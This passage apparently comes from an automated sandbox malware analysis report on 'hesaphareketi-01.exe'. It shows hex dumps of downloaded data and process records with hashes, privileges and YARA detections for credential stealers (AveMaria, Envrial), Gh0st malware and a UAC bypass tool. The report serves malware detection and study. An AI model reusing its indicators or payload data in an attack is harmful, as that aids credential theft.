28 71 fd 93 83 e9 ad 91 ba 52 c0 cb 1b 9f 11 d6 f3 af 07 27 0b db b1 11 81 d2 6a 4f b6 e7 0e 2f f8 99 a0 e7 e3 0a 7a 86 88 ed 14
                                                                  Data Ascii: ]cRWA(^ x(~,="~lmE?]G.TT lcL5nVH+9t{I7)5!`p/JT<YI7N&/p]^6J'7_"XdhH*Y/O7]Vi(qR'jO/z
                                                                  2021-10-14 10:20:58 UTC464INData Raw: 9b 9b 14 48 4e 63 97 7b 35 b3 76 4c e5 a7 5a 9d 9b f3 b7 b3 8f 26 65 6a 29 e6 c4 17 1c 1c 97 f9 52 5b 58 b2 25 c4 7f 1f 05 2b 97 9e 54 a9 c0 41 1d b9 54 6c 43 5a 97 f7 63 b4 d5 5b fe 96 de 9b c2 1b 08 eb 97 7f cf ff 2f c7 b1 be 8b 9f a9 53 0e ff 47 3c 3c 61 42 bb d8 53 5c b1 7b fd 2e f8 dd 9a 1a 08 78 65 e9 a0 c9 52 e1 8a 43 8b a1 8b ba b1 a0 5e 71 9f 83 18 9d 3c 77 08 a4 e1 9f a5 67 5b 0f 4a c7 2a fd a3 7b 50 85 cf da 17 a1 3d e9 58 1a 6c bb 9e 01 2c 93 df 06 18 69 68 e5 27 c3 30 9b 1c b3 b5 37 e3 a0 7c 28 3f 06 e3 10 c8 6d a6 a4 3b 01 20 bb eb e5 4e 2b bf ea 1c b0 50 8c 44 db 5b 72 f1 6b a4 2b 6d c8 14 73 30 a1 9c 14 f7 ac dd 9e 99 31 a5 fb 6c d0 14 a4 f2 71 3e 87 e4 dc 32 81 f3 1f 43 aa 41 5d ac 22 5b 8d c3 b6 a7 c9 ce 05 bc 1e a0 9b 37 88 e3 8a 7e c6
                                                                  Data Ascii: HNc{5vLZ&ej)R[X%+TATlCZc[/SG<<aBS\{.xeRC^q<wg[J*{P=Xl,ih'07|(?m; N+PD[rk+ms01lq>2CA]"[7~
                                                                  2021-10-14 10:20:58 UTC480INData Raw: df de 05 1d dc 23 76 a3 05 77 99 4a a0 ba c7 89 81 91 48 01 f7 0f 2a 2c 09 dd b4 af 92 5b b3 b8 e0 cc 1d 80 62 f2 1a ec f4 5b 68 cd de 6f 84 e7 f1 ca 06 77 cb 4c 65 a8 15 8c c2 ef 26 57 9d c3 8d f1 8c 6a 02 d6 2a cd 39 34 4c a8 a5 92 d3 6f 17 1e 3c 1c 44 86 94 31 73 95 48 24 0c c9 6d 6e be 9e f8 6b 2a 15 16 5b 55 68 a7 c9 74 60 22 a1 03 11 ed 9c 75 81 35 a0 83 e4 51 9b fb 1d 51 15 1a 08 88 c6 fe 07 96 5e 8d b3 9f cd ef 37 64 bb 0e 10 11 79 4c a5 29 b3 d8 6c 4e ae e5 3f 39 62 cc 67 ca 00 bd 9b f3 c4 f3 57 01 80 e5 88 f9 04 1c 52 92 d9 44 74 58 6b af b7 06 d8 54 fd 56 c4 81 d5 fd b6 10 1e ac c3 bb 30 ca e9 05 c0 b8 17 8f 26 31 75 2c 6b 77 90 f1 ee 19 03 5d a8 d3 28 da 79 00 70 6c 2e 73 7b 37 6c bc 8c ae f3 2a 3d f3 7f 40 10 c7 71 ee 50 01 06 5a 9e 79 e4 2b
                                                                  Data Ascii: #vwJH*,[b[howLe&Wj*94Lo<D1sH$mnk*[Uht`"u5QQ^7dyL)lN?9bgWRDtXkTV0&1u,kw](ypl.s{7l*=@qPZy+
                                                                  2021-10-14 10:20:58 UTC496INData Raw: e4 12 fe d2 84 e1 58 71 e3 26 f0 be c6 fb 63 f1 bf 0f 09 cf 8e e1 75 1c 21 94 0b 64 c3 53 05 b0 93 e6 ff 0b 2c 29 a7 50 3c 30 3f 65 d0 3a cc fb f5 b2 39 fd dd e6 d3 7d 6a 54 5e 8f 12 53 09 10 ad be f6 1e 08 b6 84 76 ff 84 f9 de 64 89 f9 2c 76 84 42 35 0e 6d 3c 43 e9 2c 83 95 63 32 af 60 97 2f 38 f9 0c b4 e2 9b 89 93 e2 c5 a6 ca 9d fe b4 f7 a3 e4 a9 7e c9 31 2b c4 73 08 76 4b 8e dc 63 f1 b6 1f c3 9f 5c b5 c5 c5 9c 57 f6 d3 0f a6 c8 01 2d 0d f4 ef 66 76 23 20 0c 52 d3 14 1d 4a 44 45 ab bf 14 c7 7a ed 61 be 9d 3f 1a 68 5f 3a 68 b1 04 65 6d b1 33 df cb 39 09 f7 91 7c b5 9d ee 3f fb 7d 14 04 15 a9 b5 da 23 fb f2 3c 43 46 9b 3c 5c b4 a2 90 d9 02 fb 70 cf 72 eb c9 14 02 b2 08 cc 83 f4 1f 5c d1 0a 26 c0 7c 88 49 86 e3 93 8f 30 5d 0f 80 1c 46 ba c2 73 eb c8 b8 e7
                                                                  Data Ascii: Xq&cu!dS,)P<0?e:9}jT^Svd,vB5m<C,c2`/8~1+svKc\W-fv# RJDEza?h_:hem39|?}#<CF<\pr\&|I0]Fs
                                                                  2021-10-14 10:20:58 UTC512INData Raw: 29 44 39 68 a5 c3 f7 90 8d df 63 a6 08 94 cb 6b fe d6 47 10 69 cf 53 3e d8 95 8b 7b 03 50 9b 32 6d 74 1f 4f 48 c6 df 58 e6 46 a3 62 d0 33 7c 23 ad 21 a7 cc 42 37 c9 7f ec 39 f9 a5 9d 63 9a 31 50 8a 48 73 fb 95 6e 95 b6 05 9e 22 d5 c6 f3 7d 8b 46 12 2a 7a 91 3e a9 b7 bb 1c 71 b4 e3 71 c2 a6 d6 3c f4 b5 e1 9e c5 ef e4 b2 9a 8d 81 a3 73 e2 93 2a b1 4f f1 a1 8a 4c b2 ae 5b 28 cf 89 c9 1d 1e d2 8b 5f 09 42 fe 32 3a 51 3e 26 9a 08 ca 76 d6 32 d7 d9 62 d3 ec e8 e0 cf 37 00 37 03 18 f0 6a 5f 8b 3c 17 6c fd 3b da 26 6c 4d ff d3 bb 7f fb e6 ed a3 87 7f 04 9d c8 7b 39 9b fe 4c 98 b0 85 cb 0c 66 15 17 62 a5 fd 30 01 ca fa b8 5b 7f fd 63 d8 f3 a4 f2 7e d8 81 ce 7c c7 f7 e3 80 d5 d9 b9 25 e7 03 f0 2d df 96 ca 78 a9 93 f4 dd 92 17 3b 1a 94 ad 6b e0 f1 eb ae 40 82 4b 31
                                                                  Data Ascii: )D9hckGiS>{P2mtOHXFb3|#!B79c1PHsn"}F*z>qq<s*OL[(_B2:Q>&v2b77j_<l;&lM{9Lfb0[c~|%-x;k@K1
                                                                  2021-10-14 10:20:58 UTC528INData Raw: 66 39 0a be b1 b2 bf 4d c1 9d 8f 86 58 91 d9 b4 b8 84 97 59 c2 ee 29 5e 15 59 b6 d8 13 f1 e2 b2 6d 9c a6 5a 28 57 eb 53 ea f4 7c b8 20 db 00 ff 96 bf 5d bb d2 d3 a8 cb 33 5b 21 66 f1 37 a0 1a 6f 3e 71 96 9d 40 0c 3c 92 28 e2 56 d0 e3 37 b6 ad df 76 83 56 12 5c b6 65 b4 99 00 da cd 46 62 c6 4f 94 35 21 36 cb f5 80 93 ca 6e c9 29 f7 64 76 d4 02 84 9d 97 a9 09 fc 03 91 63 15 07 69 c2 b4 4f 83 25 72 b0 ff d0 7c e4 2c 0a 2a 3d f6 b4 66 65 49 f5 9c cc 9a 52 b2 fe 06 26 a3 65 8d 20 aa fb a5 03 96 92 ec ae 97 17 56 c3 10 7c 65 eb 64 50 34 12 af 6d 63 a0 3e b6 00 6f 64 f3 b6 ac 14 02 4a e3 22 36 16 d9 19 19 24 df 1f 22 92 29 6b 9f d5 cb dc 7c 86 99 4b 89 84 12 0b 74 26 1a 31 7e a4 89 2a 01 58 09 fb 47 0f 6b 89 83 b7 52 7e 8b 43 b2 91 3b 63 d1 b8 c3 16 a2 af 5c 09
                                                                  Data Ascii: f9MXY)^YmZ(WS| ]3[!f7o>q@<(V7vV\eFbO5!6n)dvciO%r|,*=feIR&e V|edP4mc>odJ"6$")k|Kt&1~*XGkR~C;c\
                                                                  2021-10-14 10:20:58 UTC544INData Raw: ad 40 56 a3 66 3d 09 c0 41 df 85 1c 9b d1 74 83 13 d9 64 17 c2 8b fe 20 1b d6 a2 2a 73 c0 00 c5 f8 ed f6 09 8b 1f a7 37 4f 5e 0e 49 03 3f 73 b8 3e 60 49 bf b3 cf b6 b7 4c 24 74 34 1f dd ba 47 52 4f d0 b1 72 5a a5 b5 48 1d 8e 09 11 84 08 4c 90 73 ce 99 32 1a 72 b7 8b 77 c3 e7 b8 ea 5c 2c 3e 8b e5 ab 6d af 81 61 6e 76 ad 15 cf 43 52 4a fc ce 4a 46 ee 32 78 5f 33 fa 6b 89 1a cb 71 87 09 1f 59 c7 72 3c 85 93 54 0c 23 27 cd 06 1b f1 c6 e7 f0 af 40 03 9b 1f bd 4e 36 78 b8 e0 70 65 05 57 ce 56 d6 87 4c 4d 00 1b 12 65 1b be 77 da 4f 7f c7 92 0f 42 4e 1d cf a8 59 fc 33 71 c4 18 b3 02 f4 87 c9 5e 53 86 f9 12 aa 83 fc 54 ed 6c 27 98 27 29 35 93 47 8f 27 eb ed 69 ff 3c f7 37 ce 42 a9 8b 5c 1b de e8 d7 6d 17 a0 2e ed 5f c1 41 4b 93 ba cc f8 d3 fa 1a 16 91 55 ec 99 0b
                                                                  Data Ascii: @Vf=Atd *s7O^I?s>`IL$t4GROrZHLs2rw\,>manvCRJJF2x_3kqYr<T#'@N6xpeWVLMewOBNY3q^STl'')5G'i<7B\m._AKU
                                                                  2021-10-14 10:20:58 UTC560INData Raw: 1f 01 f9 4d 51 88 1a b0 e7 d5 31 01 87 61 35 4b d5 89 88 82 4c 67 5a a0 c0 1b ab 0f 8f 4a 25 c1 1b 3d 33 2c 73 49 05 f3 85 be 5b f5 3d ff b7 0e ee 4a b9 e6 99 68 70 d1 de 86 04 19 5a 9f 43 7e fc cc 2c c7 6c 16 97 cc 5b c6 0f a9 50 26 21 b2 c3 97 32 b3 c1 54 23 bb a4 49 c6 0e be 20 c2 67 13 c8 b2 4b 5b d1 30 d6 70 fe 48 46 ac 41 ae da ea 49 0a 86 d8 b7 9d c7 58 ba ab 22 b7 ba 8a ff 3d ea ec 72 db 1a 98 2f a4 d9 2b 72 76 ba fc 6d fa 52 58 bf 4f f7 3c cb c2 71 46 b9 69 8b 44 23 f9 00 78 8c 76 63 03 f3 6d 0c f0 34 97 1d 7e a3 cc 00 0b a7 cb 66 b8 83 18 36 68 8e 8f 6e cf 25 4a 78 a0 e1 2f 1d 0a d9 16 72 a3 c1 67 4e 80 59 ec e4 f6 a2 2a ca ca ec ed 17 35 d1 1a b1 60 90 94 5d 09 ab c5 a7 29 d2 66 e4 fc 72 94 e5 e9 ff b8 1a 7c 27 f8 bc 8d 1f cb c0 c4 65 9c 27 91
                                                                  Data Ascii: MQ1a5KLgZJ%=3,sI[=JhpZC~,l[P&!2T#I gK[0pHFAIX"=r/+rvmRXO<qFiD#xvcm4~f6hn%Jx/rgNY*5`])fr|'e'
                                                                  2021-10-14 10:20:58 UTC576INData Raw: 31 4d d2 c9 33 2f ad c5 f8 01 6a c6 e1 33 83 9a 04 d5 8b 59 53 c4 b5 df ae 02 47 96 22 df 36 64 80 f2 8c 76 06 fd 22 83 44 49 1c 66 3d 3d c4 78 0c 36 ad 92 ee da 03 c9 bf 08 da a6 a2 6a 0f 54 bb d6 e5 5a 43 db 39 fa be 60 45 95 d6 83 e5 5a d6 50 43 9e ee 5c 38 86 12 96 f0 f0 ab 0a 3d 6b e3 25 5e 75 5c dd ce 38 d7 f0 34 65 be da 1b e7 4f 7c 5b aa f9 f7 41 ad cb 26 4e f2 57 bc 61 e3 99 82 64 b3 88 59 60 ed 98 1b 0e 57 52 04 23 3a 2e e2 fc ca 4b 94 df 9c 08 9f 04 56 a8 69 41 2c 0a 23 f1 3c 30 8f a7 77 c0 19 77 3d 6c 51 f3 d2 50 f6 6b 16 4d b1 df ec ef ee 48 04 ba 2d e3 07 e3 10 90 45 51 4c 70 5d 7b fa 34 f5 2e f1 40 c1 06 3c 57 b8 04 96 5c fa 4c 44 04 1f c8 49 13 f0 5f ab cd 9e 21 b2 74 27 32 c5 4a 19 44 b8 ec 30 4d de 75 06 b7 ca c2 21 42 d9 43 ed 19 52 c8
                                                                  Data Ascii: 1M3/j3YSG"6dv"DIf==x6jTZC9`EZPC\8=k%^u\84eO|[A&NWadY`WR#:.KViA,#<0ww=lQPkMH-EQLp]{4.@<W\LDI_!t'2JD0Mu!BCR
                                                                  2021-10-14 10:20:58 UTC592INData Raw: 69 fd a4 e6 32 ff 51 58 68 0e 7d 26 9a db 44 2c 12 63 b4 68 97 b1 bd f7 83 c2 44 23 c8 f8 b3 ab d4 da 88 af f4 1a b2 8a 8f 42 78 21 df 48 86 fc 5e 6d 6b 71 c5 1c ae ed af ec 78 5f e4 5c b9 65 b0 33 d3 0e 63 47 ad d8 1a f0 88 87 34 6b 13 c6 39 50 f1 bc b7 81 57 09 94 a1 3b c5 9d 32 f1 43 89 27 1d 89 cc ba 46 09 9f 9b fd 6f 7a f1 3d de 17 2b e2 69 d4 58 84 03 1b 68 58 c2 3d 1a 26 8d 32 ee 96 1f bf a1 97 e6 22 22 f1 5f 2f 98 5d cb 21 86 30 f6 a3 6e a7 4d 97 c8 a2 05 cd 0d 3a 6e 2e 25 4b e0 f3 80 c8 3a f8 00 23 70 30 6d 99 e5 ea b8 2d e8 83 7b 01 17 7d de 22 ad 36 5c be 03 f4 0e c9 4b 3d 9b 73 b9 15 4e 7f a7 a0 e4 f0 b8 5c e8 e2 27 35 1e a4 48 70 81 12 56 79 e7 6d df ba d3 aa dc 5d aa cd 49 b0 88 40 f4 96 5a 4a 97 17 7a d1 0e d7 51 30 d5 8a 5a 43 0a 40 04 fb
                                                                  Data Ascii: i2QXh}&D,chD#Bx!H^mkqx_\e3cG4k9PW;2C'Foz=+iXhX=&2""_/]!0nM:n.%K:#p0m-{}"6\K=sN\'5HpVym]I@ZJzQ0ZC@
                                                                  2021-10-14 10:20:58 UTC608INData Raw: 39 bb ad 0f 39 68 4c 76 84 6d 1d 70 08 6f f6 58 e2 5d 97 29 15 cb 4a 41 2c f1 21 55 b6 8a a6 00 ef af 33 fb ac be d0 a5 97 c8 e3 5f 67 49 44 aa 41 f7 c9 d1 27 66 9d d1 de 5e c9 d6 69 b4 26 ac 13 cc 48 24 61 19 6b 45 72 48 0f ad 63 2e bb 25 99 c7 85 34 eb 8e 5b e0 d9 78 73 b6 aa 10 98 93 50 74 48 f4 9d 3b 6f c7 af 61 58 cc 1e a0 00 78 9f 74 56 10 38 8a 17 be 0d e6 26 4f 3d 66 57 48 13 24 f2 0b 08 81 9d 7c ac df cc 5a 7b 44 34 72 f4 ad 86 ec 15 e1 d3 58 c0 52 5f 0d ee 10 bc 4d b5 8d 0d c7 d8 52 56 bb 79 b4 a4 72 2c a2 8c 8c 98 0c 90 b7 04 76 db d5 00 0a 88 b0 1e 61 b0 ee 19 a7 b0 ce 63 73 e6 d9 d8 7d 2c 60 72 a4 e8 a5 e7 cc 19 e1 85 10 39 dd 29 aa a9 2c e7 5a f9 36 f2 a6 76 d2 96 2d c9 f7 d2 04 43 11 47 a5 4b a7 13 88 2f 66 ff bf ae 22 f0 d7 0f 0a 9a 8f 97
                                                                  Data Ascii: 99hLvmpoX])JA,!U3_gIDA'f^i&H$akErHc.%4[xsPtH;oaXxtV8&O=fWH$|Z{D4rXR_MRVyr,vacs},`r9),Z6v-CGK/f"
                                                                  2021-10-14 10:20:58 UTC624INData Raw: 85 87 1b f3 9a 4d 0f bc 9d d6 58 0c e0 4b 7c 5c 2e 6f d0 2f 8b c8 a3 f1 81 95 7d b6 ca a5 d3 a1 5a 05 68 ac b1 be 06 50 71 b3 b9 71 20 19 a8 85 a5 52 a7 75 2e 5b 79 4d bf 1c b5 44 7a af 52 b4 77 0c da c4 7b d5 41 c9 fd 7f d6 c5 f6 03 60 20 b8 42 1a b2 38 f2 c1 7b dd 55 de 0b be 37 59 b4 e2 82 d8 50 d2 91 6a 29 3c e4 15 f5 70 96 32 88 4b 1c 1b f9 45 b6 d5 98 b3 72 53 6b 9c 05 f4 20 91 97 3e 65 37 73 b3 9b dc 59 b0 a0 d3 77 d6 fe 47 05 b0 2e c4 33 01 5b fa 66 2a 2f 9f 54 43 67 8f 4f 1b bd b3 eb 0b 6f 41 86 9e 54 96 b5 2a ae 41 17 1b f3 9b 69 27 8a f6 23 4b 6a 00 f9 64 18 ea 3c 0f 1e fc 7e c7 66 05 bb f3 b0 a1 7c 0d d7 d1 fe f7 1c 7a 18 cf c1 c4 9d ed f4 51 85 ae 29 cd d7 b0 e2 be 30 47 c7 ea d5 02 42 50 89 c2 48 2c 06 52 c9 94 c4 b8 23 d3 8b 1f 26 f7 91 c7
                                                                  Data Ascii: MXK|\.o/}ZhPqq Ru.[yMDzRw{A` B8{U7YPj)<p2KErSk >e7sYwG.3[f*/TCgOoAT*Ai'#Kjd<~f|zQ)0GBPH,R#&
                                                                  2021-10-14 10:20:58 UTC640INData Raw: eb 81 ba 9f e5 af ed 56 09 1c 59 dc b4 2e ee 75 ca 5d 91 46 5e a5 9f a8 d7 67 1b 0b 84 e8 2d ff 34 bd e9 68 71 84 ab 41 66 a4 63 84 59 67 c8 22 f4 58 6a a9 e6 ad 5b 6b a4 34 13 db 76 07 a8 fb a7 3b fd c2 38 7c d8 de c4 04 b4 93 25 eb 59 1a 4a b3 1c da 83 d3 7f 46 a6 41 4c 90 ea 2b dd 10 6e 5d 00 c9 c6 72 99 18 d5 a6 f6 b9 57 55 3d 7f 0e 82 b9 81 cc 0e 43 ef 1f c7 a8 27 de ea 41 4f 02 77 aa a8 ff f3 99 91 91 f3 a4 5e db 39 9e e7 b3 21 93 57 8c 19 6a 61 d0 c0 49 05 c9 9d a6 5e cd 91 11 a3 1d eb ce 0c 97 db 15 b9 93 86 e5 b1 87 6c c9 b3 aa a4 d4 dc 94 9d 9f 3a d2 61 d6 ae 53 0f e8 45 d5 82 fc 1e c9 dc 2d 64 27 cb 4b cf b3 e6 89 1e da 60 e3 47 4f 4e f0 09 da d1 19 54 91 3a e6 f9 e3 d8 1a bf 8b 43 d3 4e 5a ed 03 1d 3d 53 57 2f 6c 2e 15 d4 08 dc 34 12 02 35 b8
                                                                  Data Ascii: VY.u]F^g-4hqAfcYg"Xj[k4v;8|%YJFAL+n]rWU=C'AOw^9!WjaI^l:aSE-d'K`GONT:CNZ=SW/l.45
                                                                  2021-10-14 10:20:58 UTC656INData Raw: 85 f6 31 a8 22 66 ac 5f 4a 34 af 1a 8d 61 95 92 3b 46 a6 0e 9f 4c e6 07 bf 12 04 89 d3 24 6c 05 81 5c 7c be e2 e8 6e 6c 21 5c 75 90 6d 90 fa bb c5 5c 3d ca 9c 5d 07 fe c3 25 5a 4b 86 89 03 4c 13 d3 f3 b8 d1 19 eb 2f da 16 0d 87 a3 7c 04 cd b0 86 d5 2b ae b9 b5 57 f5 e2 6b e0 32 55 86 37 e1 9b 70 ab b1 8d 2b 06 4c 94 6b 15 ca b1 1e a5 77 84 f7 6d e6 56 72 ea d4 3b aa 28 f4 ab 0a 79 d3 fc df a4 92 5f 84 6d 33 23 b5 13 e6 af 2d ba 46 1b c7 cf 11 8b 86 61 d6 92 b5 c5 31 87 c1 e9 f7 76 4d 1d 5e 00 62 2d c9 cf cb 54 2c 30 a2 3e 99 f5 56 8b 4f 81 dc 6f 46 8b 05 76 31 8e 86 9b 53 7e 6e d5 b0 9a 51 60 d3 17 b5 39 a0 dc ed b9 97 2b 36 35 ee 89 79 ee b1 e1 d6 44 3c bb 52 f9 58 c0 6d 55 b5 1f 56 04 50 34 99 b9 e6 0f f9 ce 10 1a ad ba 13 84 9f b3 66 5f c2 9f 51 3b 52
                                                                  Data Ascii: 1"f_J4a;FL$l\|nl!\um\=]%ZKL/|+Wk2U7p+LkwmVr;(y_m3#-Fa1vM^b-T,0>VOoFv1S~nQ`9+65yD<RXmUVP4f_Q;R
                                                                  2021-10-14 10:20:58 UTC672INData Raw: b0 28 5f 4d 4c b6 35 c8 00 d2 4d 68 b2 ac 6a de ab 54 d2 ed 35 69 ca e8 3a 04 87 8b 22 f3 ff 49 a1 b7 fc e8 53 4f 0f 86 c0 8f ab 45 1a 8d 30 ac 27 c1 b9 36 23 d7 52 cf a9 7f f2 2a 91 ee b4 30 3e 00 62 98 38 be fa e5 c3 02 8e 6f fd 64 8b cd 8d 0d e5 d0 20 5c 0f bc f2 68 76 72 ef 6a 53 0b e1 c2 d0 b1 09 4e ec f9 67 09 c3 e7 77 f2 2f b6 1f 98 17 79 d1 31 59 c0 d5 1f c7 fa 25 0f ab 91 cb f8 36 10 f9 20 3c 5d 2f 5a 87 1a 08 02 24 be 85 9a 02 c6 29 72 3e 91 69 aa 4f 33 f7 77 ba ad 6a 23 eb 66 8c 65 77 6a f9 61 07 d1 33 53 88 20 64 e1 a9 ac 61 e4 71 cd cb c1 80 50 65 18 9c 79 2c 94 05 c6 b2 c4 46 19 31 9c c5 fe 94 14 3c dc cc 18 e8 c3 63 01 b0 84 7f 67 0c d1 fa 09 df 76 6b 44 5f 75 16 35 fc d5 33 f9 14 b4 6f 85 f0 e9 ad ac 43 f6 d2 3c f1 4c 60 ed a8 3a 33 74 0e
                                                                  Data Ascii: (_ML5MhjT5i:"ISOE0'6#R*0>b8od \hvrjSNgw/y1Y%6 <]/Z$)r>iO3wj#fewja3S daqPey,F1<cgvkD_u53oC<L`:3t
                                                                  2021-10-14 10:20:58 UTC688INData Raw: 93 1c 42 3e 13 6d bf 43 02 9b 53 bf f3 fc 70 10 da 55 20 a0 0d 0d ba 1d b5 37 98 ff a4 98 c2 14 40 cf 22 df 52 90 6a df 3e 17 c0 b3 c9 e7 12 1e df 02 e0 34 18 e2 9c 2e fb d7 c7 cd d2 63 9b 1d 8c ce 16 77 6b bb 51 4a f1 d6 03 62 cb 2f a7 d2 33 53 6f 95 30 35 af 5d d0 4f 09 99 a2 03 d0 24 5f 7f 58 95 a9 d9 14 65 1e a5 9d ad b5 e2 f6 7b de d6 8f f3 5c 0c 31 94 50 f4 95 94 6d bc 30 04 b0 99 77 d4 9a a4 6d 44 c5 b7 be 8d 58 b8 cc 9f e8 5f 87 76 3f bc b1 dc e2 1c 28 11 16 4f 08 44 0f a9 0a c3 de 9c f0 6c a0 11 2e b8 66 8e 1c 4d 3e f4 38 d0 eb d9 da 85 b8 2f 80 ec b1 d9 f1 d8 72 0c 63 3e bf 06 eb b9 93 a8 b5 e5 9e 1b 88 45 eb ce 5e ca 1a 2c 2a 32 e8 c7 ae 3e 62 15 71 ec 50 74 75 88 11 9b 9d 67 34 ff ce 1b 1b 57 87 f4 6b 2e c5 dd 57 a7 13 e0 9d a8 6b a9 46 e5 54
                                                                  Data Ascii: B>mCSpU 7@"Rj>4.cwkQJb/3So05]O$_Xe{\1Pm0wmDX_v?(ODl.fM>8/rc>E^,*2>bqPtug4Wk.WkFT


                                                                  Code Manipulations

                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  Analysis Process: hesaphareketi-01.exe PID: 1700 Parent PID: 3060

                                                                  General

                                                                  Start time:12:20:36
                                                                  Start date:14/10/2021
                                                                  Path:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\hesaphareketi-01.exe'
                                                                  Imagebase:0x320000
                                                                  File size:33792 bytes
                                                                  MD5 hash:38E162610466DD251D9B377A60F65C11
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.372473445.00000000026B7000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.372473445.00000000026B7000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.372473445.00000000026B7000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.372473445.00000000026B7000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.372592569.0000000003609000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.372592569.0000000003609000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.372592569.0000000003609000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.372592569.0000000003609000.00000004.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: hesaphareketi-01.exe PID: 6464 Parent PID: 1700

                                                                  General

                                                                  Start time:12:21:36
                                                                  Start date:14/10/2021
                                                                  Path:C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
                                                                  Imagebase:0x1e0000
                                                                  File size:33792 bytes
                                                                  MD5 hash:38E162610466DD251D9B377A60F65C11
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 31%, Virustotal, Browse
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: hesaphareketi-01.exe PID: 5380 Parent PID: 1700

                                                                  General

                                                                  Start time:12:21:37
                                                                  Start date:14/10/2021
                                                                  Path:C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
                                                                  Imagebase:0x2d0000
                                                                  File size:33792 bytes
                                                                  MD5 hash:38E162610466DD251D9B377A60F65C11
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: hesaphareketi-01.exe PID: 6512 Parent PID: 1700

                                                                  General

                                                                  Start time:12:21:37
                                                                  Start date:14/10/2021
                                                                  Path:C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
                                                                  Imagebase:0x950000
                                                                  File size:33792 bytes
                                                                  MD5 hash:38E162610466DD251D9B377A60F65C11
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000011.00000003.375307414.0000000000EC7000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000011.00000003.375307414.0000000000EC7000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000011.00000003.375440152.0000000000EC9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000011.00000003.375440152.0000000000EC9000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000011.00000003.375317154.0000000000EC9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000011.00000003.375317154.0000000000EC9000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000003.375572565.0000000000EB5000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000003.375572565.0000000000EB5000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
